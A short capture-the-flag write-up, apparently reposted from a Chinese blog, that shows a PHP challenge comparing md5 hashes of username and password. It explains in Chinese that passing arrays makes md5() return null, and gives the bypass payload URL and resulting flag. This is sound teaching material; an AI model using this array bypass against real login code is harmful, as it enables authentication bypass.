<?
php
error_reporting(0
);
$flag = 'flag{test}'
;
if (
isset(
$_GET['username']) and
isset(
$_GET['password'
])) {
if (
$_GET['username'] ==
$_GET['password'
])
print 'Your password can not be your username.'
;
else if (
md5(
$_GET['username']) ===
md5(
$_GET['password'
]))
die('Flag: '.
$flag);
else
print 'Invalid password'
;
}
?>
username和password不能相同,但是md5又要一致
md5函数存在漏洞,md5不识别数组,返回null,可以进行绕过
同样sha1函数也存在这个漏洞
payload
http:
//123.206.87.240:9009/18.php?username[]=1&password[]=2
得到
Flag: flag{bugk1u-ad8-3dsa-2}
转载于:https://www.cnblogs.com/gaonuoqi/p/11406954.html
